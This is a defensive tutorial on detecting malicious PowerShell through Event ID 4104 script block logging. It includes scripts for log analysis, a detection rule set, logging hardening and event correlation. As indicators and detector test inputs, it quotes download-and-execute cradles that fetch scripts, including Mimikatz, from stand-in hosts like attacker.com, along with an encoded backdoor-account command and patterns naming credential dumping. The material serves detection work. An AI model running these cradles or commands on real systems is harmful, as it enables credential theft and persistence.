PowerShell Command Execution Event Logs

Monitoring PowerShell Command Execution Logs for Threat Detection

PowerShell’s extensive capabilities make it a prime target for abuse by attackers. Monitoring PowerShell logs, particularly Event ID 4104, helps detect potential malicious activities by capturing detailed command execution events. Here's how to leverage these logs effectively.

Key Event ID: 4104 - PowerShell Script Block Logging ("Creating Scriptblock text")

  • Log Location: Application and Services Logs → Microsoft → Windows → PowerShell → Operational (channel name Microsoft-Windows-PowerShell/Operational)

  • Task Category: Execute a Remote Command (a historical name; 4104 is written for locally executed script blocks as well)

  • Event Level: Verbose for ordinary script blocks; Warning when the block matches PowerShell's built-in list of suspicious patterns. Warning-level 4104 events are written even on hosts where script block logging has not been enabled by policy.

Why It's Important: Records the text of every script block the engine compiles, not just what was typed at a prompt. Code passed to Invoke-Expression and the decoded form of an -EncodedCommand payload are logged as their own script blocks, so each layer of obfuscation is exposed as it executes.


Steps for Analyzing PowerShell Logs

1. Filter Logs

  • Event ID: Focus on 4104 to capture PowerShell command execution.

  • Event Level: Keep both Verbose and Warning. The Warning-level 4104 events are the ones PowerShell itself flagged as suspicious, so a filter on Verbose alone discards the most interesting records.

  • Date/Time: Narrow down to the specific incident timeframe to focus your analysis.

Filtering helps reduce noise from routine administrative tasks and highlights critical command execution events.

2. Identify Commands

  • Key Field: Look for the ScriptBlockText field in the event details (shown in the General pane as "Creating Scriptblock text (N of M)"), which contains the executed PowerShell code. Long scripts are split across several 4104 events that share one ScriptBlockId; reassemble them in MessageNumber order to see the full script. The Path field is filled only when the block came from a script file; an empty Path means the code was typed interactively or passed in memory.

  • Streamline Analysis: Ignore redundant entries such as the "prompt" script block, which is logged every time an interactive console renders its prompt, unless context suggests they are significant.

3. Analyze Executed Commands

Focus on commands that indicate potential malicious activity, especially during post-exploitation phases.

Example Reconnaissance Commands:

  • whoami: Identifies the current user and their privileges.

  • Get-LocalUser: Lists all local user accounts.

  • Get-LocalGroup: Displays local groups, helping attackers identify privilege escalation opportunities.
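The three steps above, carried through as one added PowerShell example (this is not code from the original page). It pulls 4104 events for an incident window, reassembles script blocks that were split across several events, drops the "prompt" noise and flags reconnaissance commands. The 24-hour window and the keyword list are assumptions; adjust them to the incident. Run it elevated on the host under review.

```powershell
# Added example (not from the original page): collect Event ID 4104 for an
# incident window, reassemble multi-part script blocks, drop 'prompt' noise and
# flag reconnaissance commands. The 24-hour window and the keyword list are
# assumptions for the demonstration.
$start = (Get-Date).AddHours(-24)
$end   = Get-Date

# Step 1: filter by channel, ID and time. Deliberately no Level filter:
# Warning-level 4104 events are the ones PowerShell itself flagged as suspicious.
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = $start
    EndTime   = $end
} -ErrorAction SilentlyContinue

# Read a named EventData field (ScriptBlockText, ScriptBlockId, ...) from the event XML.
function Get-EventField {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# Step 2: identify commands. A long script arrives as N events sharing one
# ScriptBlockId; join them in MessageNumber order to recover the full text.
$blocks = $events | ForEach-Object {
    [pscustomobject]@{
        Time    = $_.TimeCreated
        Level   = $_.LevelDisplayName
        UserSid = $_.UserId
        Id      = Get-EventField $_ 'ScriptBlockId'
        Number  = [int](Get-EventField $_ 'MessageNumber')
        Path    = Get-EventField $_ 'Path'     # empty when the code did not come from a .ps1 file
        Text    = Get-EventField $_ 'ScriptBlockText'
    }
} | Group-Object Id | ForEach-Object {
    $parts = @($_.Group | Sort-Object Number)
    [pscustomobject]@{
        Time    = $parts[0].Time
        Level   = $parts[0].Level
        UserSid = $parts[0].UserSid
        Path    = $parts[0].Path
        Text    = -join $parts.Text
    }
}

# Step 3: drop the 'prompt' function noise and flag post-exploitation reconnaissance.
# The keyword list is an assumption; extend it with what your environment considers abnormal.
$recon   = 'whoami', 'Get-LocalUser', 'Get-LocalGroup', 'Get-LocalGroupMember', 'net user', 'net localgroup', 'Get-ADUser'
$pattern = ($recon | ForEach-Object { [regex]::Escape($_) }) -join '|'

$blocks |
    Where-Object { $_.Text.Trim() -ne 'prompt' -and $_.Text -match $pattern } |
    Sort-Object Time |
    Format-Table Time, Level, UserSid, Path,
        @{ Name = 'Text'; Expression = { $t = $_.Text.Trim() -replace '\s+', ' '; $t.Substring(0, [Math]::Min(120, $t.Length)) } } -Wrap
```

UserSid is the SID recorded on the event; resolve it with .Translate([System.Security.Principal.NTAccount]) when you need the account name. The reassembly matters in practice: a multi-kilobyte downloaded script shows up as dozens of 4104 events, and a keyword that straddles a split boundary is only visible once the parts are joined.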


Indicators of Malicious Activity

1. Suspicious Commands

Look for known malicious or suspicious command patterns, such as:

  • Downloading or executing scripts from the web:

    Invoke-WebRequest -Uri http://malicious.com/script.ps1 -OutFile script.ps1
  • Credential dumping (e.g., using Mimikatz):

    IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/mimikatz.ps1')

    The one-liner is logged, and because script block logging records what the engine compiles, the downloaded script is also written as its own 4104 event (usually split across many events that share one ScriptBlockId), so the attacker's actual tooling is visible even when the cradle is obfuscated.

2. User and Domain Verification

  • Verify the user account running PowerShell commands.

  • Check whether that account is expected to run PowerShell on that host; a service account, or a standard user on a workstation, normally is not.

  • Domain context: Analyze whether PowerShell commands are run from unusual domains or unauthorized devices.

3. Command Patterns

  • Frequent use of enumeration commands like Get-LocalUser and Get-LocalGroup.

  • Sequential execution of commands for lateral movement or privilege escalation.
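The indicators above, turned into a small rule set applied to the ScriptBlockText of 4104 events. This is an added example, not code from the original page; the regular expressions and severities are assumptions, and the sample script blocks are constructed for the demonstration. It also decodes an -EncodedCommand payload before matching, since the encoded form hides the command from naive keyword searches.

```powershell
# Added example (not from the original page): a rule set for 4104 ScriptBlockText.
# Patterns and severities are assumptions; sample inputs are constructed.
$rules = @(
    @{ Name = 'Download cradle';      Severity = 'High';     Pattern = 'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer' }
    @{ Name = 'In-memory execution';  Severity = 'High';     Pattern = 'Invoke-Expression|\bIEX\b' }
    @{ Name = 'Credential dumping';   Severity = 'Critical'; Pattern = 'mimikatz|sekurlsa|lsass' }
    @{ Name = 'Encoded command';      Severity = 'Medium';   Pattern = '-e(?:ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{16,}|FromBase64String' }
    @{ Name = 'Evasion switches';     Severity = 'Medium';   Pattern = '-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass' }
    @{ Name = 'Local enumeration';    Severity = 'Low';      Pattern = '\bwhoami\b|Get-LocalUser|Get-LocalGroup|net\s+(?:user|group|localgroup)' }
    @{ Name = 'Local persistence';    Severity = 'High';     Pattern = 'New-LocalUser|Add-LocalGroupMember|Register-ScheduledTask|New-ScheduledTask' }
)

# If the block carries -EncodedCommand <base64>, return the decoded UTF-16LE payload
# so the rules see what actually runs. Returns $null when there is nothing to decode.
function Expand-EncodedCommand {
    param([string]$Text)
    if ($Text -match '-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) } catch { }
    }
    return $null
}

# Apply every rule to the block text plus its decoded payload; emit one finding per match.
function Test-ScriptBlock {
    param([string]$Text)
    $decoded = Expand-EncodedCommand $Text
    $corpus  = if ($decoded) { "$Text`n$decoded" } else { $Text }
    foreach ($r in $rules) {
        if ($corpus -match $r.Pattern) {
            [pscustomobject]@{ Rule = $r.Name; Severity = $r.Severity; Decoded = $decoded }
        }
    }
}

# Constructed sample script blocks (not real log data): benign prompt noise,
# reconnaissance, a Mimikatz cradle and an encoded persistence command.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('New-LocalUser backdoor -NoPassword'))
$samples = @(
    'prompt',
    'whoami; Get-LocalUser; Get-LocalGroup Administrators',
    "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/mimikatz.ps1')",
    "powershell -nop -w hidden -enc $encoded"
)

foreach ($s in $samples) {
    $findings = @(Test-ScriptBlock $s)
    if ($findings.Count -eq 0) { continue }
    $summary = ($findings | ForEach-Object { "$($_.Rule) ($($_.Severity))" }) -join ', '
    '{0,-60} => {1}' -f $s.Substring(0, [Math]::Min(60, $s.Length)), $summary
    if ($findings[0].Decoded) { "    decoded payload: $($findings[0].Decoded)" }
}
```

To run this against real data, feed each reassembled block's text into Test-ScriptBlock instead of the constructed $samples. Note that on the host where an encoded command actually executes, its own 4104 event already contains the decoded text; the decoder here is for the parent block that launched it, or for logs copied from a host where script block logging was off.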


Use Case Example

Scenario: An attacker gains initial access to a system. PowerShell logs show:

  1. whoami: Confirms current access level.

  2. Get-LocalUser/Get-LocalGroup: Enumerates local users and groups for privilege escalation.

  3. New-LocalUser: Creates a backdoor user for persistence.

Analysis: By correlating PowerShell logs with other security logs (e.g., Security Event ID 4720 for the account creation and 4732 if it is added to a local group, authentication logs, file access logs), the security team confirms the unauthorized access and isolates the system to prevent further damage.


Recommendations for Effective Monitoring

1. Enable PowerShell Logging

  • Enable all logging modes for PowerShell:

    • Module Logging: Records pipeline execution details (the cmdlet invoked, its parameters and output) for the modules listed in the policy, as Event ID 4103; use "*" to cover all modules.

    • Script Block Logging: Captures the text of every script block the engine compiles (Event ID 4104). Invocation start/stop logging (4105/4106) is a separate, very noisy option that is usually left off.

    • Transcription: Writes a text transcript of each session's input and output to a configured directory, not to the event log; send that directory to a write-only share so an attacker on the host cannot edit it.
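The three settings above, applied through the same registry values Group Policy writes, followed by a quick check that 4104 events appear. This is an added example, not code from the original page; the transcript directory is an assumption, and the script must run elevated. It also removes the PowerShell 2.0 engine, which predates script block logging and would otherwise let "powershell -Version 2" run unlogged.

```powershell
# Added example (not from the original page): enable module, script block and
# transcription logging via the policy registry keys, remove the v2 engine, verify.
# The OutputDirectory path is an assumption; run elevated.
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param([string]$Key, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    New-ItemProperty -Path $Key -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# Script block logging -> Event ID 4104. Invocation logging (4105/4106) left off: very noisy.
Set-PolicyValue "$base\ScriptBlockLogging" 'EnableScriptBlockLogging' 1
Set-PolicyValue "$base\ScriptBlockLogging" 'EnableScriptBlockInvocationLogging' 0

# Module logging -> Event ID 4103 pipeline details; the '*' entry covers every module.
Set-PolicyValue "$base\ModuleLogging" 'EnableModuleLogging' 1
Set-PolicyValue "$base\ModuleLogging\ModuleNames" '*' '*' 'String'

# Transcription -> per-session text files under OutputDirectory (not an event log).
Set-PolicyValue "$base\Transcription" 'EnableTranscripting' 1
Set-PolicyValue "$base\Transcription" 'EnableInvocationHeader' 1
Set-PolicyValue "$base\Transcription" 'OutputDirectory' 'C:\PSTranscripts' 'String'   # assumption: use a write-only share in production

# Remove the PowerShell 2.0 engine: it has no script block logging, so
# 'powershell -Version 2' would bypass everything configured above.
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null

# Verify: a fresh process should now produce a 4104 event containing our marker.
$marker = "logging-check-$(Get-Random)"
powershell.exe -NoProfile -Command "Write-Output '$marker'" | Out-Null
Start-Sleep -Seconds 2
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = (Get-Date).AddMinutes(-1)
} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -like "*$marker*" } |
    Select-Object TimeCreated, Id, LevelDisplayName
```

On 64-bit hosts the same values under HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell control the 32-bit PowerShell host; in a domain, set these through Group Policy (Administrative Templates → Windows Components → Windows PowerShell) rather than per machine.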

2. Automate Detection with SIEM

  • Set Alerts for Event ID 4104: Use a SIEM solution to automatically detect suspicious PowerShell commands.

  • Monitor Anomalous Patterns: Alert on uncommon PowerShell usage from specific users, devices, or IP ranges.

3. Correlate with Other Logs

  • Combine PowerShell logs with:

    • Authentication logs (Security Event ID 4624, 4625).

    • Account and group management logs (Security Event ID 4720, 4732).

    • Scheduled Task logs (Security Event ID 4698, 4702).

    • Process creation logs (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled), which give the parent process and command line that started PowerShell.

This provides a more comprehensive view of an incident.
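The correlation recommended above and in the use case earlier, as one added PowerShell example (not code from the original page). It finds 4104 script blocks that create accounts, change group membership or register scheduled tasks, then looks for the Security-log events those actions produce within a short window. The 24-hour range, the 30-second tolerance and the keyword list are assumptions.

```powershell
# Added example (not from the original page): correlate persistence-related 4104
# script blocks with Security events 4720 (user created), 4732 (member added to
# local group) and 4698 (scheduled task created). Window sizes are assumptions.
$start   = (Get-Date).AddHours(-24)
$tolerance = [TimeSpan]::FromSeconds(30)

# Read a named EventData field from the event XML.
function Get-EventField {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# 1. Script blocks that perform a persistence action (keyword list is an assumption).
$persist = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $start
} -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventField $_ 'ScriptBlockText') -match 'New-LocalUser|Add-LocalGroupMember|Register-ScheduledTask' }

# 2. The side effects those actions leave in the Security log (reading it requires admin).
$security = Get-WinEvent -FilterHashtable @{
    LogName = 'Security'; Id = 4720, 4732, 4698; StartTime = $start
} -ErrorAction SilentlyContinue

# 3. Pair each script block with Security events inside the tolerance window.
foreach ($ps in $persist) {
    $related = $security | Where-Object {
        [Math]::Abs(($_.TimeCreated - $ps.TimeCreated).TotalSeconds) -le $tolerance.TotalSeconds
    }
    [pscustomobject]@{
        Time           = $ps.TimeCreated
        UserSid        = $ps.UserId
        ScriptText     = (Get-EventField $ps 'ScriptBlockText').Trim()
        SecurityEvents = ($related | ForEach-Object {
            $ev = $_     # capture before switch: inside switch, $_ is the value being tested
            switch ($ev.Id) {
                4720 { "4720 user created: $(Get-EventField $ev 'TargetUserName')" }
                4732 { "4732 added $(Get-EventField $ev 'MemberSid') to group $(Get-EventField $ev 'TargetUserName')" }
                4698 { "4698 task created: $(Get-EventField $ev 'TaskName')" }
            }
        }) -join '; '
    }
}
```

A 4104 block that creates a user with no matching 4720 is as interesting as a match: either the command failed, or the audit policy is not producing the Security events (4720/4732 need "Audit User Account Management" and "Audit Security Group Management"; 4698 needs "Audit Other Object Access Events"). Check the policy before concluding nothing happened.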

4. Restrict PowerShell Usage

  • Limit who can run PowerShell interactively: application control (AppLocker or Windows Defender Application Control) can block powershell.exe and powershell_ise.exe for users who have no administrative need for it, while leaving signed, approved scripts runnable.

  • Deploy Constrained Language Mode for non-admin users. It is enforced through an AppLocker or WDAC policy in enforcement mode, which also blocks unsigned scripts; setting it by environment variable is trivially bypassed and is not a control.

  • Remove the PowerShell 2.0 engine (the MicrosoftWindowsPowerShellV2Root optional feature): it has no script block logging, so an attacker who can start "powershell -Version 2" runs without producing 4104 events.

5. Use Threat Intelligence

  • Cross-reference executed commands with known Indicators of Compromise (IOCs).

  • Monitor for uncommon scripts or tools downloaded via PowerShell.


Key Points

Monitoring Event ID 4104 provides a window into potentially malicious PowerShell activity. By focusing on command execution patterns, user behavior, and script content, security teams can detect and respond to attacks involving PowerShell, such as reconnaissance, credential theft, and persistence. Combining these logs with other system logs enhances incident detection and response, helping to safeguard critical assets.
